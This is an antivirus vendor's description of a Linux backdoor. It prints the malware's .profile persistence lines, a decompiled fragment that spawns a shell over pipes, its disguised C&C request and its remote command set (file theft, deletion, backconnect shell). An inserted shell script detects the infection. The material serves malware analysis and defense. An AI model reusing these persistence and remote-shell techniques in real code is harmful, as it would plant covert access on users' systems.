
Linux.BackDoor.FakeFile.1

Added to the Dr.Web virus database: 2016-10-14

Virus description added:

SHA1:

  • 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b

A backdoor for Linux. Upon launching, it copies itself to the file

<HOME>/.gconf/apps/gnome-common/gnome-common

It then searches for a hidden file, whose name matches the file name of the Trojan, and replaces the executable file with it. For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv.

If the file is found, the Trojan opens the respective application to view the file:

| Extension | Application |
| --- | --- |
| .doc .DOC .xls .XLS .ppt .PPT .docx .DOCX .xlsx .XLSX .pptx .PPTX .odt .ODT .ods .ODS .odp .ODP | soffice |
| .pdf .PDF | evince |
| any other extension | gedit |

If the file is absent, the Trojan creates it and opens it in gedit. The Trojan then checks the name of the Linux distribution installed on the device: if the name is anything other than openSUSE, Linux.BackDoor.FakeFile.1 appends the following lines to the file <HOME>/.profile or the file <HOME>/.bash_profile:

# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
    "$HOME/.gconf/apps/gnome-common/gnome-common"
fi
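As an added example (not part of the Dr.Web description), a POSIX shell check for the persistence markers described above: the dropped copy under <HOME>/.gconf and the lines appended to .profile/.bash_profile. The paths and the SHA-1 come from this description; the two sample home directories the script builds are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not Dr.Web's code. Looks for the persistence markers that
# Linux.BackDoor.FakeFile.1 leaves in a home directory.

MARKER='.gconf/apps/gnome-common/gnome-common'        # path written into .profile
SAMPLE_SHA1='0138fc4d50c734e288388f7c8cbbea5e2ad08a8b' # hash from the description

# Return 0 if FILE contains the line the backdoor appends to .profile/.bash_profile.
profile_has_marker() {
    [ -f "$1" ] && grep -qF "$MARKER" "$1"
}

# Return 0 if the dropped copy exists under the given home directory.
dropped_copy_present() {
    [ -f "$1/$MARKER" ]
}

# Return 0 if FILE's SHA-1 equals the published sample hash.
matches_sample_hash() {
    [ -f "$1" ] || return 1
    sum=$(sha1sum "$1" | cut -d' ' -f1)
    [ "$sum" = "$SAMPLE_SHA1" ]
}

# Scan one home directory: print each finding, return 0 if anything was found.
scan_home() {
    home="$1"; found=1
    for f in "$home/.profile" "$home/.bash_profile"; do
        if profile_has_marker "$f"; then
            echo "persistence line in $f"; found=0
        fi
    done
    if dropped_copy_present "$home"; then
        echo "dropped copy at $home/$MARKER"; found=0
        matches_sample_hash "$home/$MARKER" && echo "  SHA-1 matches the known sample"
    fi
    return $found
}

# Constructed demo data: one home with the appended block, one clean home.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/infected" "$DEMO/clean"
printf '# if execute the gnome-common\nif [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then\n    "$HOME/.gconf/apps/gnome-common/gnome-common"\nfi\n' > "$DEMO/infected/.profile"
printf 'export PATH=$HOME/bin:$PATH\n' > "$DEMO/clean/.profile"
```

Run it against real accounts with `scan_home /home/<user>`; a hit on the dropped-copy path is the stronger indicator, since a profile line alone can survive after the binary has been removed.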

The viewer program and the Trojan's own copy are launched through a shell whose standard streams are connected to the Trojan by two pipes (decompiled fragment):

pipe(v32);                      /* v32: child's stdout/stderr -> parent */
pipe(v31);                      /* v31: parent -> child's stdin */
status = fork();
if ( !status )
{
  /* child: stdin from v31's read end, stdout and stderr to v32's write end */
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1u);
  while ( execl("/bin/sh", "/bin/sh", 0) < 0 )   /* keep retrying until a shell starts */
    sleep(1u);
  exit(status);
}
/* parent: keep copies of its original descriptors, then attach stdin/stdout to the pipes */
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
write(1, s1, strlen(s1));        /* s1: the command line handed to the shell */
write(1, &unk_8053D40, 1u);      /* followed by a single byte from unk_8053D40 */

If the Trojan is launched from the path <HOME>/.gconf/apps/gnome-common/gnome-common, it reads the configuration data from its own file and decrypts it. The malware then starts two threads: the first exchanges information with the command and control (C&C) server, and the second monitors the duration of the connection. If the Trojan goes more than 30 minutes without receiving instructions, the connection is dropped. The exchange with the C&C server is disguised as HTTP requests that look as follows:

GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string> HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: */*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache

Linux.BackDoor.FakeFile.1 can execute the following commands:

| Name | Function |
| --- | --- |
| RR | Send the C&C server the number of messages transferred during the session |
| DR | Send a list of the contents of the specified folder |
| DF | Send the C&C server the specified file, or a folder with all its contents |
| D1 | Delete a file using the command rm -r |
| D0 | Delete a file using the command unlink |
| RF | Rename a folder |
| US | Remove itself |
| RP | Launch a new copy of the process |
| QQ | Close the current session |
| RT | Establish a backconnect and run sh |
| CP | Terminate the backdoor's operation |
| FF | Open the executable file of the process for writing |
| CO | Close the process file |
| BF | Create a file or folder |
| FD | Write the transmitted values to a file |
| EF | Obtain the directory listing using the command ls |
| CX | Set 777 permissions on the specified file |
| CR | Terminate the backconnect |

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.